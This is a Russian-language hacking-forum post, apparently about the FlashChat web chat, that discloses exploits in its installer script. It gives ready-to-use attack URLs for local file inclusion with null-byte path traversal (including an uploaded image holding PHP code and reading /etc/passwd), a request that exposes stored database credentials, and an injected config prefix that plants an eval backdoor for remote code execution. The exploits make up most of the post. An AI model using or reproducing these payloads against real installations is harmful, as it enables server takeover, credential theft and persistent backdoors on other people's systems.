Пришлось по работе поковыряться - слил эту версию и по-быстрому просмотрел только процесс инсталляции, так что это типа признания, что я вообще весь чат не смотрел, а только мельком. 1) LFI (need: magic_quotes=off) Бажный файл: install.php PHP: ... $step = $_GET['step']; if( ! $step || $step<0 || $step>8) { $step = 1; } include "./install_files/step_$step.php"; ... В чате можно заливать свой фон для окна чата в формате JPG. Заливаем фон-картинку со своим пхп-кодом и он кладётся сюда: \images\cust_img\ Т.о. пример эксплоита выглядит так: /install.php?step=/../../images/cust_img/5f_121171317514078.jpg%00 или так: /install.php?step=/../../../../../../../../../etc/passwd%00 2) Conf read Вот так читается уже прописанные данные для мускуля в конфиге: /install.php?step=2 Смотрим сорец и видим пасс за звёздочками, юзера, бр и сервер.. ну всё как пологается вобщем. 3) Cod exec (need: magic_quotes=off) Ну а тут основано на втором этапе. Конфиг этот можно переписать (если ест ьправа на запись. если их нет - чат выдаст предупреждение что нет прав). Т.о. идём: /install.php?step=2 и в префикс ДОПИСЫВАЕМ следующее (т.е. то что там было - не стираем): Code: ',); if (isset($_GET[o])) eval($_GET[o]); /* После этого выполняем код вот так: /inc/config.srv.php?o=[your_eval_code]
Про первый и второй пункт я писал на форуме больше года назад (FlashChat some bugz). А способ с записью в конфиг интересный.
Поиск у нас знаете ли херово работает =) Пускай модер раздела склеит топик со старым, чтобы было в одном.
